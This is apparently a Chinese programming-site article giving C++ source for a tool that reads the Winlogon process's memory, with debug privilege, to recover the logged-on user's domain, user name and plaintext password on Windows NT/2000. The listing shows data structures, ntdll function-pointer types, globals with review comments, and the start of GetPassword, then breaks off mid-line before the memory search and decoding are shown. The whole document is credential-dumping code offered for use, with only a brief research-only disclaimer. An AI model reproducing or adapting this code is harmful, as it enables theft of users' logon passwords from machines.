
获取WinNT/Win2k当前用户名和密码

时间:2009-12-22 15:42来源:未知 作者:admin 点击:

  本文所用代码的原创作者已不可考，由 ccrun 的一位朋友“磨刀老头”提供，在此对作者表示感谢；经 ccrun（老妖）在 Win2k 下试验成功。注意：该方法需要先为自身进程启用 SeDebugPrivilege（即需要管理员权限），然后直接读取 Winlogon 进程的内存，而且定位密码页的逻辑按 WinNT / Win2k 分别实现，只对这两个版本的内存布局有效；代码中解码出的明文密码存放在全局缓冲区里，使用后应当及时清零。此类代码仅供安全研究与授权测试使用。

  

  

// 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:

  

// bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)

  

//---------------------------------------------------------------------------

  

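// Hand-rolled mirror of the native NT UNICODE_STRING. It is the argument
// type of the RtlRunDecodeUnicodeString pointer resolved from ntdll and the
// type of ENCODED_PASSWORD_INFO::EncodedPassword, so field order and widths
// must match the native layout exactly. (The original listing spelled the
// keyword "strUCt", which does not compile; fixed here.)
// NOTE(review): if <winternl.h> or <ntdef.h> is ever included in this
// translation unit this definition will collide with the SDK one — guard it
// or switch to the SDK type.
typedef struct _UNICODE_STRING
{
    USHORT Length;        // NOTE(review): in the native definition this is a byte count, not a character count — verify before using it as a string length
    USHORT MaximumLength; // capacity of Buffer, in bytes in the native definition
    PWSTR  Buffer;        // not guaranteed to be NUL-terminated in the native definition
} UNICODE_STRING, *PUNICODE_STRING;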

  

// Record layout the author uses for entries returned by the resolved
// NtQuerySystemInformation pointer. The code that walks these entries is
// not part of this listing, so the meaning of each field is inferred from
// its name only — presumably one handle-table entry (owning PID, the handle
// value and the access mask granted to it). The field widths are part of the
// on-the-wire layout and must not be changed.
typedef struct _QUERY_SYSTEM_INFORMATION
{
    DWORD GrantedAccess;   // access mask granted to the handle (by name)
    DWORD PID;             // owning process id (by name)
    WORD  HandleType;      // object type index (by name)
    WORD  HandleId;        // NOTE(review): meaning not evident from this listing — confirm against the parsing code
    DWORD Handle;          // handle value in the owning process (by name)
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;

  

// Header that precedes an array of PROCESS_INFO records. Presumably the
// module list filled in by RtlQueryProcessDebugInformation (the pointer
// resolved below), but the code that reads it is outside this listing.
// Unk04/Unk08 are unidentified padding/fields the author kept for layout.
typedef struct _PROCESS_INFO_HEADER
{
    DWORD Count;   // number of PROCESS_INFO records that follow (by name)
    DWORD Unk04;   // unidentified — kept only to preserve the layout
    DWORD Unk08;   // unidentified — kept only to preserve the layout
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;

  

// One record of the list described by PROCESS_INFO_HEADER. By the field
// names it describes a module loaded in the inspected process (base
// address, size and path); the consumer is not in this listing. The Unk*
// members are unidentified and exist only to keep the binary layout.
typedef struct _PROCESS_INFO
{
    DWORD LoadAddress;   // module base address (by name); a 32-bit value, so this layout is 32-bit only
    DWORD Size;          // module image size (by name)
    DWORD Unk08;         // unidentified — layout padding
    DWORD Enumerator;    // NOTE(review): meaning not evident from this listing
    DWORD Unk10;         // unidentified — layout padding
    char  Name [0x108];  // ANSI module path, 0x108 = 264 bytes (MAX_PATH + 4); NOTE(review): treat as possibly unterminated when reading
} PROCESS_INFO, *PPROCESS_INFO;

  

// Layout of the in-memory record the tool looks for inside Winlogon. It
// carries the obfuscated logon password (EncodedPassword) together with the
// per-record key byte (HashByte) that the resolved RtlRunDecodeUnicodeString
// pointer takes as its first argument. Every Unk* member is unidentified and
// kept purely to line the named fields up with what the author observed on
// WinNT/Win2k; this layout is version-specific and has no meaning on later
// Windows releases.
typedef struct _ENCODED_PASSWORD_INFO
{
    DWORD HashByte;                // key byte for the decode routine; NOTE(review): stored as DWORD but the decode pointer takes a BYTE — only the low byte can be meaningful
    DWORD Unk04;                   // unidentified — layout padding
    DWORD Unk08;                   // unidentified — layout padding
    DWORD Unk0C;                   // unidentified — layout padding
    FILETIME LoggedOn;             // logon time (by name); presumably used to validate that a candidate page is a real record — confirm in the locate code
    DWORD Unk18;                   // unidentified — layout padding
    DWORD Unk1C;                   // unidentified — layout padding
    DWORD Unk20;                   // unidentified — layout padding
    DWORD Unk24;                   // unidentified — layout padding
    DWORD Unk28;                   // unidentified — layout padding
    UNICODE_STRING EncodedPassword; // obfuscated password; Buffer points into the *remote* (Winlogon) address space and must be read via ReadProcessMemory, never dereferenced directly
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

  

  

// Function-pointer types for the undocumented ntdll exports that GetPassword
// resolves at runtime with GetProcAddress. The parameter lists are the
// author's hand-written approximations (DWORD standing in for HANDLE, ULONG
// and NTSTATUS); they are not taken from an SDK header, so keep them in sync
// with the calls that use them.

// NtQuerySystemInformation(info class, buffer, buffer length, returned length).
// NOTE(review): the real export returns NTSTATUS, a signed value; test for
// success with a signed ">= 0" compare (or NT_SUCCESS), not "== 0 / != 0"
// alone, and expect STATUS_INFO_LENGTH_MISMATCH on the first sizing call.
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);

// RtlCreateQueryDebugBuffer(maximum size, event pair flag) -> debug buffer.
// The returned buffer is presumably released with the DestroyQueryDebugBuffer
// pointer declared below; callers must check for NULL before use.
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);

// RtlQueryProcessDebugInformation(process id, flags, debug buffer).
// NOTE(review): also an NTSTATUS in the real export — see the note above.
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);

// RtlDestroyQueryDebugBuffer(debug buffer): frees a buffer from the create call.
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);

// RtlRunDecodeUnicodeString(hash byte, string): de-obfuscates the string in
// place using the single key byte. The key is a BYTE here, while
// ENCODED_PASSWORD_INFO::HashByte and the global dwHashByte are DWORDs, so a
// narrowing conversion happens at the call site.
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);

  

  

// Private Prototypes

  

// Private prototypes. Only GetPassword is defined in this listing; the rest
// are referenced from its body and implemented further down in the original
// file. The comments describe the role each name plays in GetPassword, not
// the (unseen) implementations.

BOOL IsWinNT(void);                            // platform check; GetPassword bails out unless this or IsWin2K() holds
BOOL IsWin2K(void);                            // platform check for Windows 2000

// Enables SeDebugPrivilege for the current process. GetPassword treats a
// failure here as fatal, because opening/reading Winlogon's memory requires
// it — in practice this means the tool only works from an administrator
// account.
BOOL AddDebugPrivilege(void);

DWORD FindWinLogon(void);                      // locates the Winlogon process (presumably returns its PID — 0 on failure is a guess, confirm in the definition)

// Version-specific search for the page holding ENCODED_PASSWORD_INFO inside
// Winlogon. Second argument is presumably an out-parameter receiving the
// address; the layout differs between NT4 and 2000, hence two routines.
BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL LocatePasswordPageWin2K(DWORD, PDWORD);

// Copy the recovered domain / user / plaintext password into the caller's
// strings. The plaintext comes from the global buffers below; nothing in
// this listing scrubs those buffers afterwards.
void ReturnWinNTPwd(String &, String &, String &);
void ReturnWin2kPwd(String &, String &, String &);

// Entry point: fills (domain, user, password) for the interactively
// logged-on user; returns false on unsupported OS or missing privilege.
bool GetPassword(String &, String &, String &);

  

  

// Global Variables

  

// Global variables. Resolved ntdll entry points (filled in by GetPassword via
// GetProcAddress — they are NULL until then, and GetPassword does not check
// for a failed lookup in the part of it visible here) and scratch state for
// the recovered credential.
// NOTE(review): everything here is file-scope but not static, and the
// plaintext password ends up in these buffers; nothing in this listing
// zeroises them after use. Callers should SecureZeroMemory the buffers once
// the strings have been copied out.

PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;

DWORD dwPwdLen = 0;            // length of the recovered password (by name; unit — bytes or characters — not evident here)
PVOID pvRealPwd = NULL;        // decoded (plaintext) password buffer (by name)
PVOID pvPwd = NULL;            // presumably the still-encoded copy read out of Winlogon — confirm in ReturnWin*Pwd
DWORD dwHashByte = 0;          // key byte for the decode routine; only the low byte is passed (the decode pointer takes a BYTE)

// Fixed-size wide-character buffers for the logon account. 0x400 is a count
// of wchar_t elements (2 KiB each), not bytes; the code that fills them is
// not in this listing, so bound any copy into them by the element count.
wchar_t wszUserName[0x400];
wchar_t wszUserDomain[0x400];

  

//---------------------------------------------------------------------------

  

bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)

  

{

  

if(!IsWinNT() && !IsWin2K())

  

{

  

// 只适合于2000或者XP

  

return false;

  

}

  

// Add debug privilege to PasswordReminder -

  

// this is needed for the search for Winlogon.

  

if(!AddDebugPrivilege())

  

{

  

// 不能够添加debug特权

  

return false;

  

}

  

// debug特权已经成功加入到本程序

  

HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");

  

  

pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)

  

GetProcAddress(hNtDll,"NtQuerySystemInformation");

  

pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)

  

GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");

  

pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)

  

GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");

  

pfnRtlDe

  
